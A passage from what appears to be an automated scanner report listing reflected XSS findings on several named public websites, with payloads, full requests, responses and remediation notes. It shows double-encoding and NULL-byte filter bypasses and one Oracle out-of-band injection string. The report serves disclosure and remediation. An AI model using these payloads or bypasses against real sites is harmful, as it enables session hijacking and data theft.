Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ygebeo553nhi5mztwrtyso45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 was submitted in the REST URL parameter 3. This input was echoed as 551b7"style="x:expression(alert(1))"8d874867177 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/x22551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gtu5y445d4j1giqdn4l3bg55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d was submitted in the REST URL parameter 3. This input was echoed as bd314"style="x:expression(alert(1))"9639797b41d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=w11nlueclbe1ry55ysywmpry; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.216. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 436c4"style="x:expression(alert(1))"7d96edb3e1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sxjxsy55v4wrlmeet1lslx45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8809 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.217. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e581f"style="x:expression(alert(1))"3b6d10c18aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/ Set-Cookie: ASP.NET_SessionId=qlfc4j452c3dom55lvonz145; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8809 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a was submitted in the REST URL parameter 1. This input was echoed as 9bd6e"style="x:expression(alert(1))"b4a37af963a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/ Set-Cookie: ASP.NET_SessionId=s4s50qr0kvr4fhux3xpku555; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8683 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e was submitted in the REST URL parameter 1. This input was echoed as 2d4c3"style="x:expression(alert(1))"a464241924e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x222d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=xxiaal45scvt05rw0scrir55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8704 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.220. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ce3"style="x:expression(alert(1))"57e4b8b7737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: ASP.NET_SessionId=s4rkbbezripwlcr04310bhix; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8725 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.221. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db50c"style%3d"x%3aexpression(alert(1))"751e53b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db50c"style="x:expression(alert(1))"751e53b85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?db50c"style%3d"x%3aexpression(alert(1))"751e53b85e=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:39 GMT Content-Length: 8718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: ASP.NET_SessionId=f0nhyr451wf2n5ul5fkcv5fi; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae was submitted in the url parameter. This input was echoed as 4c0ad"style="x:expression(alert(1))"f42279855ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j84c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae&title=Magadheera+SmartDesis.TK.mp4 HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the '"--></style></script><script>alert(0x000043)</script> request parameter is copied into the HTML document as plain text between tags. The payload 8e1ef<script>alert(1)</script>559c076520b was submitted in the '"--></style></script><script>alert(0x000043)</script> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00354d0"%3bbf98880f27f was submitted in the _flowExecutionKey parameter. This input was echoed as 354d0";bf98880f27f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27%00354d0"%3bbf98880f27f HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761712|check#true#1296759912; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:07:54 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 20354
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... op7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'.354d0";bf98880f27f', the expected format is '_c<conversationId> ...[SNIP]...
The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00e6"%3balert(1)//a43b114193b was submitted in the _flowExecutionKey parameter. This input was echoed as b00e6";alert(1)//a43b114193b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5103"%3bb8f83f9f764 was submitted in the _flowId parameter. This input was echoed as a5103";b8f83f9f764 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow%00a5103"%3bb8f83f9f764 HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:47:13 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 22588
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... r=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="No such flow definition with id 'loginact-flow.a5103";b8f83f9f764' found; the flows available are: array<String> ...[SNIP]...
3.227. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.supermedia.com
Path:
/spportal/spportalFlow.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39e64"%3balert(1)//5b99acdfcf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39e64";alert(1)//5b99acdfcf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:18:59 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 20465
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... nable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map['39e64";alert(1)//5b99acdfcf8' -> ...[SNIP]...
3.228. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631c1"><script>alert(1)</script>026bbe791e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?631c1"><script>alert(1)</script>026bbe791e4=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:52 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:52 GMT;path=/
3.229. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f46'-alert(1)-'8e1de3e7335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a8f46'-alert(1)-'8e1de3e7335=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:54 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:54 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a8f46'-alert(1)-'8e1de3e7335=1" rel="nofollow"> ...[SNIP]...
3.230. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd053--><script>alert(1)</script>e1950324e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
